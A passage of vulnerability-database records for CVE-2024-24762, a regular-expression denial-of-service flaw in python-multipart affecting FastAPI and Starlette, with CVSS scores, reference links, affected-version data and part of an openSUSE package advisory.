                "product_data": [
                  {
                    "product_name": "fastapi",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.109.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "tiangolo"
            },
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "starlette",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_name": "0",
                          "version_value": "0.36.2"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "encode"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.1.0-dev"
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-400",
                "lang": "eng",
                "value": "CWE-400 Uncontrolled Resource Consumption"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p",
            "refsource": "MISC",
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "name": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4",
            "refsource": "MISC",
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389",
            "refsource": "MISC",
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          },
          {
            "name": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238",
            "refsource": "MISC",
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "name": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74",
            "refsource": "MISC",
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "name": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5",
            "refsource": "MISC",
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc",
            "refsource": "MISC",
            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "name": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1",
            "refsource": "MISC",
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-2jv5-9r88-3w3p",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "configurations": [
          {
            "nodes": [
              {
                "cpeMatch": [
                  {
                    "criteria": "cpe:2.3:a:tiangolo:fastapi:*:*:*:*:*:*:*:*",
                    "matchCriteriaId": "8B47D84E-D97C-4E52-91AE-270FCFA34800",
                    "versionEndExcluding": "0.109.1",
                    "vulnerable": true
                  }
                ],
                "negate": false,
                "operator": "OR"
              }
            ]
          }
        ],
        "descriptions": [
          {
            "lang": "en",
            "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
          },
          {
            "lang": "es",
            "value": "FastAPI es un framework web para crear API con Python 3.8+ basado en sugerencias de tipo est\u00e1ndar de Python. Cuando se utilizan datos de formulario, `python-multipart` usa una expresi\u00f3n regular para analizar el encabezado HTTP `Content-Type`, incluidas las opciones. Un atacante podr\u00eda enviar una opci\u00f3n de \"Tipo de contenido\" personalizada que es muy dif\u00edcil de procesar para RegEx, consumiendo recursos de CPU y deteni\u00e9ndose indefinidamente (minutos o m\u00e1s) mientras se mantiene el bucle de evento principal. Esto significa que el proceso no puede manejar m\u00e1s solicitudes. Es un ReDoS (expresi\u00f3n regular de denegaci\u00f3n de servicio), solo se aplica a aquellos que leen datos del formulario usando `python-multipart`. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 0.109.0."
          }
        ],
        "id": "CVE-2024-24762",
        "lastModified": "2024-02-17T02:15:52.700",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "nvd@nist.gov",
              "type": "Primary"
            },
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2024-02-05T15:15:09.260",
        "references": [
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Patch"
            ],
            "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Product"
            ],
            "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
          },
          {
            "source": "security-advisories@github.com",
            "tags": [
              "Exploit",
              "Vendor Advisory"
            ],
            "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Modified",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-1333"
              }
            ],
            "source": "nvd@nist.gov",
            "type": "Primary"
          },
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-400"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Secondary"
          }
        ]
      }
    }
  }
}

fkie_cve-2024-24762

Vulnerability from fkie_nvd

Published

2024-02-05 15:15

Modified

2025-05-05 14:14

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
security-advisories@github.com	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
security-advisories@github.com	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
security-advisories@github.com	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
security-advisories@github.com	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
security-advisories@github.com	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
security-advisories@github.com	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
security-advisories@github.com	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238	Broken Link
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/releases/tag/0.109.1	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389	Broken Link

Impacted products

Vendor	Product	Version
fastapiexpert	python-multipart	*
fastapiexpert	python-multipart	*
encode	starlette	*
tiangolo	fastapi	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "F446019A-4E17-401B-865F-3AD3E2EB40AD",
              "versionEndExcluding": "0.0.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:fastapiexpert:python-multipart:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "F446019A-4E17-401B-865F-3AD3E2EB40AD",
              "versionEndExcluding": "0.0.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:encode:starlette:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "DE3FCFFD-84C3-4AF4-80CF-2FB38B78D1E0",
              "versionEndExcluding": "0.36.2",
              "vulnerable": false
            },
            {
              "criteria": "cpe:2.3:a:tiangolo:fastapi:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B47D84E-D97C-4E52-91AE-270FCFA34800",
              "versionEndExcluding": "0.109.1",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "`python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can\u0027t handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7."
    },
    {
      "lang": "es",
      "value": "FastAPI es un framework web para crear API con Python 3.8+ basado en sugerencias de tipo est\u00e1ndar de Python. Cuando se utilizan datos de formulario, `python-multipart` usa una expresi\u00f3n regular para analizar el encabezado HTTP `Content-Type`, incluidas las opciones. Un atacante podr\u00eda enviar una opci\u00f3n de \"Tipo de contenido\" personalizada que es muy dif\u00edcil de procesar para RegEx, consumiendo recursos de CPU y deteni\u00e9ndose indefinidamente (minutos o m\u00e1s) mientras se mantiene el bucle de evento principal. Esto significa que el proceso no puede manejar m\u00e1s solicitudes. Es un ReDoS (expresi\u00f3n regular de denegaci\u00f3n de servicio), solo se aplica a aquellos que leen datos del formulario usando `python-multipart`. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 0.109.0."
    }
  ],
  "id": "CVE-2024-24762",
  "lastModified": "2025-05-05T14:14:26.363",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-02-05T15:15:09.260",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Broken Link"
      ],
      "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Broken Link"
      ],
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

opensuse-su-2024:13664-1

Vulnerability from csaf_opensuse

Published

2024-06-15 00:00

Modified

2024-06-15 00:00

Summary

python310-python-multipart-0.0.7-1.1 on GA media

Notes

Title of the patch

python310-python-multipart-0.0.7-1.1 on GA media

Description of the patch

These are all security issues fixed in the python310-python-multipart-0.0.7-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2024-13664

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "python310-python-multipart-0.0.7-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the python310-python-multipart-0.0.7-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-13664",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13664-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-24762 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-24762/"
      }
    ],
    "title": "python310-python-multipart-0.0.7-1.1 on GA media",
    "tracking": {
      "current_release_date": "2024-06-15T00:00:00Z",
      "generator": {
        "date": "2024-06-15T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:13664-1",
      "initial_release_date": "2024-06-15T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-06-15T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-python-multipart-0.0.7-1.1.aarch64",
                "product": {
                  "name": "python310-python-multipart-0.0.7-1.1.aarch64",
                  "product_id": "python310-python-multipart-0.0.7-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-python-multipart-0.0.7-1.1.aarch64",
                "product": {
                  "name": "python311-python-multipart-0.0.7-1.1.aarch64",
                  "product_id": "python311-python-multipart-0.0.7-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-python-multipart-0.0.7-1.1.aarch64",
                "product": {
                  "name": "python312-python-multipart-0.0.7-1.1.aarch64",
                  "product_id": "python312-python-multipart-0.0.7-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-python-multipart-0.0.7-1.1.aarch64",
                "product": {
                  "name": "python39-python-multipart-0.0.7-1.1.aarch64",
                  "product_id": "python39-python-multipart-0.0.7-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-python-multipart-0.0.7-1.1.ppc64le",
                "product": {
                  "name": "python310-python-multipart-0.0.7-1.1.ppc64le",
                  "product_id": "python310-python-multipart-0.0.7-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-python-multipart-0.0.7-1.1.ppc64le",
                "product": {
                  "name": "python311-python-multipart-0.0.7-1.1.ppc64le",
                  "product_id": "python311-python-multipart-0.0.7-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python312-python-multipart-0.0.7-1.1.ppc64le",
                "product": {
                  "name": "python312-python-multipart-0.0.7-1.1.ppc64le",
                  "product_id": "python312-python-multipart-0.0.7-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python39-python-multipart-0.0.7-1.1.ppc64le",
                "product": {
                  "name": "python39-python-multipart-0.0.7-1.1.ppc64le",
                  "product_id": "python39-python-multipart-0.0.7-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-python-multipart-0.0.7-1.1.s390x",
                "product": {
                  "name": "python310-python-multipart-0.0.7-1.1.s390x",
                  "product_id": "python310-python-multipart-0.0.7-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-python-multipart-0.0.7-1.1.s390x",
                "product": {
                  "name": "python311-python-multipart-0.0.7-1.1.s390x",
                  "product_id": "python311-python-multipart-0.0.7-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-python-multipart-0.0.7-1.1.s390x",
                "product": {
                  "name": "python312-python-multipart-0.0.7-1.1.s390x",
                  "product_id": "python312-python-multipart-0.0.7-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python39-python-multipart-0.0.7-1.1.s390x",
                "product": {
                  "name": "python39-python-multipart-0.0.7-1.1.s390x",
                  "product_id": "python39-python-multipart-0.0.7-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python310-python-multipart-0.0.7-1.1.x86_64",
                "product": {
                  "name": "python310-python-multipart-0.0.7-1.1.x86_64",
                  "product_id": "python310-python-multipart-0.0.7-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-python-multipart-0.0.7-1.1.x86_64",
                "product": {
                  "name": "python311-python-multipart-0.0.7-1.1.x86_64",
                  "product_id": "python311-python-multipart-0.0.7-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-python-multipart-0.0.7-1.1.x86_64",
                "product": {
                  "name": "python312-python-multipart-0.0.7-1.1.x86_64",
                  "product_id": "python312-python-multipart-0.0.7-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python39-python-multipart-0.0.7-1.1.x86_64",
                "product": {
                  "name": "python39-python-multipart-0.0.7-1.1.x86_64",
                  "product_id": "python39-python-multipart-0.0.7-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-python-multipart-0.0.7-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.aarch64"
        },
        "product_reference": "python310-python-multipart-0.0.7-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-python-multipart-0.0.7-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.ppc64le"
        },
        "product_reference": "python310-python-multipart-0.0.7-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-python-multipart-0.0.7-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.s390x"
        },
        "product_reference": "python310-python-multipart-0.0.7-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python310-python-multipart-0.0.7-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python310-python-multipart-0.0.7-1.1.x86_64"
        },
        "product_reference": "python310-python-multipart-0.0.7-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-python-multipart-0.0.7-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.aarch64"
        },
        "product_reference": "python311-python-multipart-0.0.7-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-python-multipart-0.0.7-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.ppc64le"
        },
        "product_reference": "python311-python-multipart-0.0.7-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-python-multipart-0.0.7-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.s390x"
        },
        "product_reference": "python311-python-multipart-0.0.7-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-python-multipart-0.0.7-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-python-multipart-0.0.7-1.1.x86_64"
        },
        "product_reference": "python311-python-multipart-0.0.7-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-python-multipart-0.0.7-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.aarch64"
        },
        "product_reference": "python312-python-multipart-0.0.7-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-python-multipart-0.0.7-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.ppc64le"
        },
        "product_reference": "python312-python-multipart-0.0.7-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-python-multipart-0.0.7-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-python-multipart-0.0.7-1.1.s390x"
        },
        "product_reference": "python312-python-multipart-0.0.7-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
